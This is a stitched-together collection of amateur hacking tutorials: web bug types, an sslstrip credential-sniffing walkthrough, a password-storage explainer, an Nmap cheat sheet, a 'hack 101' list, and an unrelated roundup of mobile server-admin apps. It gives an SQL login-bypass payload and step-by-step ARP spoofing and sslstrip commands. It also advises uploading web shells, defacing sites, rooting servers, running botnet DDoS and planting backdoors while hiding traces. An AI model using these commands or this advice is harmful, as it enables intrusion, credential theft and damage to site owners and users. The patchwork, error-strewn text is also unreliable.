WEB PENTESTING-

web pentesting there
are many type of bugs in the website
some which is given below
1.sql injection-
this type of bug is for beginner there are lot
of the websites .for tat we can insert in the
input field following command like
' or '1'='1
in the username and password both aNd
after that u can bypass the cpanel of the
websites
and upload your vuln shelll and after that
you can use metasploit for shared server
hacking
if there is linux server is used then you can
root the server or symlink the particular
server.
2.SQLI-
these type of vulnerability in the database of
that websites.for attacking on that you can
use havij for windows machine(KIDDIES).if
you are work on linux then you can use
sqlmap for
datebase hacking if you are professional
hacker then you can use the browser side
query based
attack on that target website.Once you got
the admin and pass themn you can deface
thaT
by using shell like C99,R57 etc
3.XSS-
this is cross site scripting based attack on
that websites in which we can insert the
text on that target websites and which can be
reflected on that browser side or can we
stored '
on the database of website(server side)
4.dir traversal-
it is a type of bug in which there is sensitive
link is directly is open by url side
by browser
5. Remote code execution vulnerability-
A Remote Code Execution attack is a result of
either server side or client side security
weaknesses.
Vulnerable components may include libraries,
remote directories on a server that haven’t
been monitored, frameworks, and other
software modules that run on the basis of
authenticated user access. Applications that
use these components are always under
attack through things like scripts, malware,
and small command lines that extract
information.
some examples of that LFI,RFI,web dav
remote code execution,JCE exploit etc
6. DDOS-
DDoS, or Distributed Denial of Services is
where a server or a machine’s services are
made unavailable to its users.
it's usually agenda is temporarily interrupt or
completely take down a successful running
system.
DDoS attack could be sending tons of URL
requests to a website or a webpage in a very
small amount of time.
BOTNET is popularly used for that DDOS,BY
BOTNET we can connect many clients on
that .
after that we can flood on that websites.

how to use SSLstrip in kali linux:

what is sslstrip-
sslstrip is a MITM attack tool that allows to
attacker manipulates the traffic & capture
data such as user name and password.
how it works for-
it works for converting https request into
basic http request.
Step-1
for enabling ipforwarding so our computer
can route traffic
echo 1 > /proc/sys/net/ipv4/ip_forward
Step-2
now we need configure ip table so that our
computer can redirect traffic
iptables -t nat -A PREROUTING -p tcp --
destination-port 80 -j REDIRECT --to-ports
8080
Step-3
for start ARP spoof
arpspoof -i <interface> -t <target ip> -r
<gateway ip>
Step-4
so now we need sslstrip in a new terminal
(don't close previous terminal)
sslstrip -l 8080
Note-you can done arp spoofing by ettercap

How Your Passwords Are Stored on the Internet

*********** Passwords ********** 1
How Your Passwords Are Stored on the
Internet
here are a number of ways a site can store
your password, and some are considerably
more secure than others. Here's a quick
rundown of the most popular methods, and
what they mean for the security of your
data.
Method One: Plain Text Passwords
How It Works: The simplest way a site can
store your password is in plain text. That
means somewhere on a their server, there
exists a database with your username and
password in it in a human-readable form
(that is, if your password is testing123, it is
stored in the database as testing123). When
you enter your credentials on the site, it
checks them against the database to see if
they match. This is the worst possible
method, in security terms, and most
reputable web sites do not store passwords
in plain text. If someone hacks this database,
everyone's password is immediately
compromised.
Does My Strong Password Matter? No way.
No matter how long or strong your password
may be, if it's stored in plain text and the
site gets hacked, your password is easily
accessible to anyone, no work required. It
still matters in terms of hiding your
passwords from, say, your friends, or others
that could easily guess it, but it won't make
any difference if the site gets hacked.1
Method Two: Basic Password Encryption
How It Works: To add more protection to
your password than plain text provides, most
sites encrypt your password before they
store it on their servers. Encryption, for
those of you that don't know, uses a special
key to turn your password into a random
string of text. If a hacker were to get hold of
this random string of text, they wouldn't be
able to log into your account unless they
also had the key, which they could then use
to decrypt it.
The problem is, the key is often stored on
the very same server that the passwords are,
so if the servers get hacked, a hacker doesn't
have to do much work to decrypt all the
passwords, which means this method is still
wildly insecure.
Does My Strong Password Matter? No. Since
it's easy to decrypt the password database
with a key, your strong password won't make
a difference here either. Again: this is in
terms of the site getting hacked; if you have
a nosy friend or family member rooting
through your stuff, a strong password can
help keep them from guessing it.

The Nmap

The Nmap aka Network Mapper is an open
source and a very versatile tool for Network
administrators. Nmap is used for exploring
networks, perform security scans, network
audit and finding open ports on remote
machine. It scans for Live hosts, Operating
systems, packet filters and open ports
running on remote hosts.
Scan a System with Hostname and IP Address
1.Scan using Hostname
nmap server2.tecmint.com
2.Scan using IP Address
nmap 192.168.0.101
3.Scan using “-v” option ( “-v” option is
giving more detailed information about the
remote machine. )
map -v server2.tecmint.com
4.Scan Multiple Hosts
map 192.168.0.101 192.168.0.102
192.168.0.103
5.Scan a whole Subnet
nmap 192.168.0.*
6.Scan Multiple Servers using last octet of IP
address
nmap 192.168.0.101,102,103
7.Scan an IP Address Range
nmap 192.168.0.101-110
8.Scan Network Excluding Remote Hosts
nmap 192.168.0.* --exclude 192.168.0.100
9.Scan OS information and Traceroute
nmap -A 192.168.0.101
10.Enable OS Detection with Nmap
nmap -O server2.tecmint.com
11.Scan a Host to Detect Firewall
nmap -sA 192.168.0.101
12.Scan a Host to check its protected by
Firewall
nmap -PN 192.168.0.101
13.Find out Live hosts in a Network
nmap -sP 192.168.0.*
14.Perform a Fast Scan
nmap -F 192.168.0.101
15.Find Nmap version
nmap -V
16.Scan Ports Consecutively
nmap -r 192.168.0.101
17.Print Host interfaces and Routes
nmap --iflist
18.Scan for specific Port
nmap -p 80 server2.tecmint.com
19.Scan a TCP Port
nmap -p T:8888,80 server2.tecmint.com
20.Scan a UDP Port
nmap -sU 53 server2.tecmint.com
21.Scan Multiple Ports
nmap -p 80,443 192.168.0.101
22.Scan Ports by Network Range
nmap -p 80-160 192.168.0.101
23.Find Host Services version Numbers
nmap -sV 192.168.0.101
24.Scan remote hosts using TCP ACK (PA) and
TCP Syn (PS)
nmap -PS 192.168.0.101
25.Scan Remote host for specific ports with
TCP ACK
nmap -PA -p 22,80 192.168.0.101
26.Scan Remote host for specific ports with
TCP Syn
nmap -PS -p 22,80 192.168.0.101
27.Perform a stealthy Scan
nmap -sS 192.168.0.101
28.Check most commonly used Ports with
TCP Syn
nmap -sT 192.168.0.101
29.Perform a tcp null scan to fool a firewall
nmap -sN 192.168.0.101
Download link :- http://nmap.org/
download.html

how to hack a website/computer 101

step 1 scan your target
step 2 find open ports that u can exploit
step 3 exploit them!
step 4 now you are in the system! fuck shit
up
step 5 create a backdoor so you can easy
acess again
step 6 leave no trace of you the more silent
you get the more your able to hear its better to wait a while and see if you can acess something else (like fb/email
***** you are responsible for what u do hacking is illegal.Good luck:)

Top Server And Admin Applications For Android And IPhone: android-vs-ios

No matter what is the nature of your work,
whether you are a webmaster, server
administrator or an IT professional, the
ability is to deal with your admin tasks and
the server is your utmost priority. In this
article, we are going to discuss the top five
server and admin applications that is suitable
to your iPhone, and Android mobile gadgets.
1. AndFTP
For those who are not yet familiar about
AndFTP it serves as an SCP, FTP, and SFTP
and FTPS client. Moreover, AndFTP let the
user to handle number of FTP configurations;
as well it provides features like download
and upload and sharing management. As well
AndFTP allows the user to delete, rename,
open, or update permissions, and also to run
custom commands.
2. ConnectBot
ConnectBot act as a Secure Shell client
intended for Android users, as well it creates
secure connection through using a shell even
the gadget is in the remote distance to
transmit files and data back and forth to
your phone. Furthermore, ConnectBot let the
user to handle numbers ofSSH sessions, as
well allow them to copy and paste between
other applications, and to build protected
tunnels.
Jack Wallen an award winning writer of
Linux.com stated that ConnectBot is a must
have app, in fact he recommend this app to
the Linux admin who are using Android
phone.
3. ServerMonitor
ServerMonitor is an app intended for iPhone
users, it uses SSH protocol to link machines
remotely to assists with your workstation and
server monitoring requirements. The multi-
protocol supports include the following: FTP,
SMTP, HTTP, IMAP, MySQL, HTTPS, DNS,
POP3, Ping and SSH.
Although there is no much review regarding
this app but the general response seems to
be optimistic. Based on the feedback from
the users one thing they want to be added in
this app on the next update is the ability to
view all list of running processes and to view
how much memory they occupy.
4. iSSH – SSH / VNC Console
The iSSH – SSH / VNC Console for iPhone is
an SSH and Telnet emulator that is fully
featured with ANSI, VT102, VT100, and
VT220 incorporated with tunneled X server,
RDP client and VNC client. As well this app
has the ability to carry simultaneous
connections with total terminal
compatibility, intuitive user interface, and
configurable macro and key options.
5. Network Utility
Network Utility let the user to check the
status of their server or websites through
their Apple device or iPhone anywhere.
Network Utility is fully featured with TCP/IP
Port Scan, ping (ICMP Echo), IP address
information, Whois Query, GeoIP Lookup,
and more.
For me this another iPhone app that seems
to be gathering mixed reviews. Some user
approved its efficiency and its user
friendliness, but other user rising complaint
that this app causes their device to freeze up
that can only be fixed through restarting the
device. Users as well object about the
absence of subnet scans. The decision is still
out on this app. But the best thing we need
to do is to try this and experience how it
holds up.